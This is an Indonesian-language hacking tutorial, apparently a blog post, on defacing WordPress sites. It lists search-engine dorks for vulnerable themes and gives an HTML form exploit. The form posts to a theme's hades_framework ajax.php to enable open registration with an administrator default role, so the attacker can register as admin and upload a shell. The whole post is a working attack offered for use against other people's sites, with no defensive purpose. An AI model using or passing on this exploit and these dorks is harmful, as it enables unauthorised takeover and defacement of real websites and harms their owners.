DEFACE DENGAN ADD ADMIN WP VULNERABILITY

DEFACE DENGAN ADD ADMIN WP VULNERABILITY
Daftar Isi Artikel


Ane mau Share nih tehnik Deface dengan Add Admin, langsung aja yehh,
Bahan bahan yg dibutuh kan.


Scipt Shell kalian, bebasan.

Dork:
inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/GantiDengantema/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/themanya/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
•dan masih banyak lagi tema Vuln lainnya

Eksploit:

<form action="http://target.com/wp-content/themes/nama tema/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="email ente yg masih aktip">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>


Register site:
http://target.com/wp-login.php?action=register

kalo udah Register cek email kalian, dan kalian akan menerima Password kalian.